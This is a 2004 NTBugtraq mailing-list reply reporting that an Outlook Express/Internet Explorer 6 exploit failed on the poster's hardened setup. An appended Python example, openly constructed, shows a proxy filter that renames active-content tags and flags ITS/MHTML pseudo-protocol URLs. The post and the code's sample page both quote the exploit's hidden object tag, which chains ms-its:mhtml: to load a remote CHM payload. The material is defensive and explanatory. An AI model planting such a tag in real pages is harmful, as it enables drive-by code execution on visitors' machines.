Re: NOT GOOD: Outlook Express 6 + Internet Explorer 6

From: Fish (fish_at_INFIDELS.ORG)
Date: 04/02/04

  • Next message: Benny Teh (M_IT Ops): "Suspicious WebDAV Traffic"
    Date: Fri, 2 Apr 2004 00:56:50 -0800
    To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
    
    

    -----BEGIN PGP SIGNED MESSAGE-----
    Hash: SHA1

    <snip>
    > This also works just fine on Outlook 2003 in default
    > configuration with Exchange Outlook Security Template
    > with IE 6.x fully patched. Suspect earlier versions
    > of Outlook work also.
    <snip>

    Not on my system running Outlook 98 it doesn't. <shrug>

    But then again, my Restricted Sites security zone isn't using the
    default settings either. ;-)

    I honestly don't understand why so many people trust "default"
    settings -- especially default SECURITY settings.

    I have my Restricted Sites zone configured with everything set to
    'Disable'. Double-clicking the exploit .eml file launches Outlook
    Express on my system even though I have my system configured to use
    Outlook as my email client and not Outlook Express -- go figure.
    <shrug> I guess Windows/Internet Explorer ignores your preferences
    and uses your file type (file extensions) associations instead
    <shrug>.

    Anyway, Outlook Express launches and the exploit email (form?)
    appears with the link highlighted. I click on the link and
    immediately get a "Security Alert" popup dialog informing me:

      "Your current security settings do not allow you to send HTML
      forms."

    So I don't think the exploit worked. :)

    I then opened the exploit .eml file in notepad and copy & pasted the
    URL from there (http://www.malware.com/t-bill.html) into the address
    bar of Internet Explorer, and guess what?

    A completely blank page. :)

    Viewing the source to this page reveals the following:

      <xbject
        data="ms-its:mhtml:file://C:\foo.mhtml!http://www.malware.com//bad.chm::/foo.html"
        type="text/x-scriptlet" style="visibility:hidden">

    Note that the above tag ("xbject") appears EXACTLY as you see it:
    "xbject" and NOT "object" as one might at first suspect. That is
    because: 1) my Internet Explorer is configured to use my AdCruncher
    Proxy as an HTTP proxy, and 2) my AdCruncher Proxy filtering plugin
    is configured to automatically disable all malware type exploits
    (scripts, objects, embedded, etc) for all sites that I "do not trust"
    (which is ALL sites by default).

    So.... what does all this mean?

    Well, what it means to ME is:

    1. One should not trust "default" security settings, and should
    instead manually review and modify/set them according to your OWN
    standards.

    2. AdCruncher Proxy[1] -- with its ability to disable any/all
    scripting on any/all web sites/pages desired -- has once again proven
    itself to be a valuable extra layer of protection against HTTP based
    exploits.

    --
    "Fish" (David B. Trout)
       fish@infidels.org

    Fight Spam! Join CAUCE!
    http://www.cauce.org/

    [1] http://home.sprintmail.com/~dtrout/AdCruncher/ReadMe.html

    It still needs a LOT of work (and I'm currently in the process of
    trying to get that [much needed] work done too -- along with a LOT of
    other work besides), as does the default plugin filtering DLL too,
    but even in its current state it's *still* (IMO) a halfway decent
    product. <shrug> But then, I'm biased I guess. ;-)

    -----BEGIN PGP SIGNATURE-----
    Version: PGP 7.0.4

    iQA/AwUBQG0q0Ej11/TE7j4qEQK/tgCgjge51pdH0dKzg5Lrv/DHOEmn/TMAoMIS
    EfecuZmb40Sbo8hVUmXWLSTe
    =wJ4P
    -----END PGP SIGNATURE-----

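The two proxy-side checks the post above relies on, written for this page as an added example. It is not AdCruncher's code (AdCruncher's filter is a plugin DLL whose internals are not shown here); it only mimics what the quoted page source implies, namely that active-content tags on untrusted hosts are renamed (object becomes xbject) so the browser no longer recognises them. The sample page, the host names, the trusted-host list and the ITS/MHTML pseudo-protocol prefixes beyond the ms-its: and mhtml: seen in the post (its: and mk:@MSITStore:) are constructed for the example.

```python
import re
from typing import Iterable, List

# Tags whose content the filter neutralizes on hosts that are not trusted.
ACTIVE_TAGS = ("object", "script", "embed", "applet", "iframe")

# Pseudo-protocol prefixes that chain Internet Explorer's ITS/MHTML handlers.
# ms-its: and mhtml: are the ones in the exploit page quoted above; the other
# two are related handlers added here as an assumption for the example.
SUSPICIOUS_SCHEMES = ("ms-its:", "mhtml:", "its:", "mk:@msitstore:")

# Opening or closing tag for one of ACTIVE_TAGS, e.g. "<object " or "</script>".
_TAG_RE = re.compile(
    r"<(/?)(" + "|".join(ACTIVE_TAGS) + r")(?=[\s>/])", re.IGNORECASE
)
# URL-bearing attributes the ITS/MHTML trick is delivered through.
_ATTR_URL_RE = re.compile(
    r"""\b(?:data|src|href|codebase)\s*=\s*["']?([^"'\s>]+)""", re.IGNORECASE
)


def neutralize_active_content(html: str, host: str,
                              trusted_hosts: Iterable[str] = ()) -> str:
    """Rename active-content tags so the browser treats them as unknown elements.

    "<object" becomes "<xbject", "<script" becomes "<xcript", and so on (the
    form seen in the page source above).  The markup stays readable in View
    Source, but an unrecognised element has no plugin, no script engine and no
    'data' loader behind it.  Hosts in trusted_hosts pass through unchanged;
    the default (no trusted hosts) matches the post's "distrust all sites".
    """
    if host.lower() in {h.lower() for h in trusted_hosts}:
        return html

    def _rename(m):
        slash, name = m.group(1), m.group(2)
        return "<" + slash + "x" + name[1:]

    return _TAG_RE.sub(_rename, html)


def find_suspicious_urls(html: str) -> List[str]:
    """Return attribute URLs that start with an ITS/MHTML pseudo-protocol.

    This flags the "ms-its:mhtml:file://...!http://...chm::/..." chaining
    pattern for logging, whether or not the tag carrying it was neutralized.
    """
    hits = []
    for m in _ATTR_URL_RE.finditer(html):
        url = m.group(1)
        if url.lower().startswith(SUSPICIOUS_SCHEMES):
            hits.append(url)
    return hits


# Constructed sample page that embeds the tag quoted in the post above plus a
# plain script block and some harmless text.
SAMPLE_HTML = (
    '<html><body>\n'
    '<object data="ms-its:mhtml:file://C:\\foo.mhtml!http://www.malware.com//bad.chm'
    '::/foo.html" type="text/x-scriptlet" style="visibility:hidden"></object>\n'
    '<script>document.location="http://example.invalid/";</script>\n'
    '<p>Visible text stays.</p>\n'
    '</body></html>'
)


if __name__ == "__main__":
    filtered = neutralize_active_content(SAMPLE_HTML, "www.malware.com")
    print(filtered)
    print("suspicious URLs:", find_suspicious_urls(SAMPLE_HTML))
```

Run on the sample the object and script tags come back as xbject and xcript while the paragraph is untouched, and the ms-its:mhtml: URL is reported once; passing the same host in trusted_hosts returns the page unchanged, which is the "trust" decision the post makes per site rather than per default zone.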

